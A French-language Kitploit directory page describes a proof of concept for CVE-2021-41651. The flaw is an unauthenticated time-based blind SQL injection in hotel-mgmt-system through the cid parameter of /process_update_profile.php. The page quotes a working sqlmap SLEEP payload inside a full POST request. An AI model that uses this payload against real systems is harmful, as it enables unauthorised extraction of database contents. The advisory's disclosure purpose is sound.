Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-41651 — Preuve de concept d'exploitation pour CVE-2021-41651, démontrant une injection SQL aveugle basée sur le temps non authentifiée dans hotel-mgmt-system via le paramètre cid, permettant l'extraction de données sensibles depuis MySQL. | Kitploit
Outils/GitHubGitHub/mobiusbinary/cve-2021-41651
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubmobiusbinary/cve-2021-41651

CVE-2021-41651

Preuve de concept d'exploitation pour CVE-2021-41651, démontrant une injection SQL aveugle basée sur le temps non authentifiée dans hotel-mgmt-system via le paramètre cid, permettant l'extraction de données sensibles depuis MySQL.

Voir le dépôt
1il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-41651

CVE-2021-41651 Injection SQL dans hotel-mgmt-system

Le système hotel-mgmt-system est vulnérable à une attaque non authentifiée par injection SQL aveugle basée sur le temps.

Le paramètre cid de la page /process_update_profile.php n'assainit pas l'entrée utilisateur, un attaquant peut extraire des données sensibles de la base de données MySQL sous-jacente.

Lien vers l'application

hotel-mgmt-system

Composants et paramètres affectés

URL: /process_update_profile.php
PARAMÈTRE: cid

Preuves de concept

SQLMAP PAYLOADS

Paramètre cid sur la page /process_update_profile.php

Parameter: cid ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf&submitBtn=Update&fullName=James&[email protected]&newPassword=fasdfasdfasdfasdfasdf-

Si l'image POC n'est pas claire, veuillez cliquer sur le GIF qui se chargera dans une meilleure résolution.

POC - CID

Découvert par

Jason Colyvas
MOBIUSBINARY
23 septembre 2021

Télécharger l’outil